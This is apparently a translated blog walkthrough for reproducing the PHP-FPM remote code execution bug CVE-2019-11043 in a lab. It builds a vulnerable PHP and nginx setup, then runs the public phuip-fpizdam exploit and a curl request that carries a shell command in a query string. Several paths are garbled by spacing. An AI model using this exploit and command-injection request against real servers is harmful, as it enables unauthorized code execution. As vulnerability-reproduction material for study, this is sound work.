Recent projects need to reproduce the nginx exp, which includes the exp of cve-2019-11043, he is an exp of remote code execution;
Source of this cve: GitHub-neex / phuip-fpizdam: Exploit for CVE-2019-11043
After I read it, I compiled the source code on Kali. You should pay attention to compile go version 1.13 or above. The compiled executable file can be executed on the Linux platform
What hurts me is the vulnerability configuration required by the target machine: PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11
There is an article detailing how to reproduce this exp ( https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/ ), in which the author Considering that the required version may not be downloaded when the article is published, a low-level php-fpm deb package is provided ( http://security.ubuntu.com/ubuntu/pool/universe/p/php7.2/ ) However, I have been unable to solve the dependency problem during the installation process, so I have to compile the low version of php source code. And extraction code are provided later)
Unzip the source code and enter the folder. Before compiling, we first install some compilation dependent libraries:
sudo -i
apt-get install gcc
apt-get install g++
apt-get install libxml2-dev
apt-get install libssl-dev
apt-get install libbz2-dev
apt-get install libjpeg-dev
apt install libpng-dev
apt install libmcrypt-dev
apt-get install curl
cd /usr/local/include
ln -s /usr/include/x86_64-linux-gnu/curl curl
apt-get install libcurl4-gnutls-dev
Pay special attention to the last three lines, it perfectly solves the error of configure: error: Please reinstall the libcurl distribution that appears during compilation;
Well, the following can be compiled with confidence;
./configure --prefix=/usr/local/php --enable-fpm --with-mcrypt --enable-mbstring --disable-pdo --with-curl --disable-debug --disable-rpath --enable-inline-optimization --with-bz2 --with-zlib --enable-sockets --enable-sysvsem --enable-sysvshm --enable-pcntl --enable-mbregex --with-mhash --enable-zip --with-pcre-regex --with-mysqli --with-gd --with-jpeg-dir --with-openssl
make && make install
make test
make clean
建立软链接
ln -s /usr/local/php-$PHP_VERSION/bin/php /usr/bin/php
ln -s /usr/local/php-$PHP_VERSION/bin/phpize /usr/bin/phpize
ln -s /usr/local/php-$PHP_VERSION/bin/pecl /usr/bin/pecl
ln -s /usr/local/php-$PHP_VERSION/bin/php-config /usr/bin/php-config
ln -s /usr/local/php-$PHP_VERSION/sbin/php-fpm /usr/bin/php-fpm
Add user and group
useradd nobody
groupadd nobody
Set configuration file
cd / usr / local / php / etc
cp php-fpm.conf.default php-fpm.conf
cd /usr/local/php/etc/php-fpm.d
cp www.conf.default www.conf
Okay, let's test if the installation was successful
cd /usr/local/php/sbin
./php-fpm -v
If the version information of php-fpm is printed out, it means that the compilation and installation are successful;
Next, we have to install nginx. Since there is no special requirement for the nginx version, we can install it directly from the command line.
apt-get install nginx
Next, we need to configure php-fpm + nginx connection;
Part1: Configure php-fpm
#Add user and group
sudo -i
useradd nginx
usermod -G nginx nginx
#php and nginx unix socket communication method
cd / usr / local / php / var / run
touch php7.1-fpm.sock
chown nginx: nginx php7.1 -fpm.sock
chmod 777 php7.1-fpm.sock
cd /usr/local/php/etc/php-fpm.d
gedit www.conf #modify
www.conf
gruop = nginx
user = nginx
listen = / usr / local / php / var / run / php7.1-fpm.sock
Remove the semicolon comment in front of listen.owner, listen.group, listen.mode, modify:
listen.owner = nginx
listen.group = nginx
(listen.mode does not need to be changed) #Close
www.conf
#See if php-fpm can still run
cd / usr / local / php / sbin after changing the configuration./php-fpm
-v #There
should be no problem
Part2: Configure nginx
gedit / etc / nginx / sites-enabled / default #Modify default and replace the following with the original configuration file
----------------------------- -------------------------------------------------- -------------------------------------------------
# See article at https://blog.simos.info/testing-cve-2019-11043-php-fpm-security-vulnerability-with-lxd-system-containers/
# Location: / etc / nginx / sites-enabled / default
server {
listen 80 default_server;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.php;
server_name _;
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
# pass PHP scripts to FastCGI server
#
location ~ [^/].php(/|$) {
include fastcgi.conf;
# regex to split $uri to $fastcgi_script_name and $fastcgi_path
fastcgi_split_path_info ^(.+.php)(/.+)$;
# Check that the PHP script exists before passing it
#try_files $fastcgi_script_name =404;
# Bypass the fact that try_files resets $fastcgi_path_info
# see: http://trac.nginx.org/nginx/ticket/321
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
fastcgi_pass unix:/usr/local/php/var/run/php7.1-fpm.sock;
}
}
--------------------------------------------------------------------------------------------------------------------------------
Part3: Test After the
above configuration is completed, restart
#Start php-fpm and nginx
sudo -i
cd / usr / local / php / sbin
./php-fpm
service nginx start
# Empower php7.1-fpm.sock
# There are two points to note here: 1. php-fpm and nginx start the authorization, otherwise the authorization is invalid;
# 2. After restart or shutdown, the authorization will be invalid, you need to re- authorize
cd / usr / local / php / var / run
chmod 777 php7. 1-fpm.sock
echo "<? php echo '<p> hello World </ p>';?>" | sudo tee /var/www/html/index.php
Then enter http: // localhost / in the browser, press Enter, if The appearance of hello World means that the connection configuration of the two is successful!
Well, three minutes on stage, ten years of work off stage, and finally it's time to use this exp;
Change the target machine network to bridge network card mode, use ifconfig to print out the target machine ip, and use ufw disable to turn off the firewall;
Run the phuip-fpizdam executable file on another linux system (for example, my own is Ubuntu 18.04)
First run the following command (exp checks whether the configuration is fragile)
./phuip-fpizdam http://<ip>/index.php
For fragile configuration, you will get the following output
After determining that the configuration is fragile, you can use this exp to perform remote code execution on the URL; the format is as follows:
curl "http://<ip>/index.php?a=/bin/sh+-c+'which+which'&"
E.g:
The id information is returned, which is consistent with the author's example. It can be said that I have successfully reproduced this exp :)
Note: This exp is not effective for each attack, you can try it a few times!
Source code of php7.1.0, link: https://pan.baidu.com/s/1ntXNkElSFWTY9nj7BIAHEg password: q7qm
If you have any questions, you can check the nginx log (path: /var/log/nginx/error.log), or you can contact me by email ([email protected])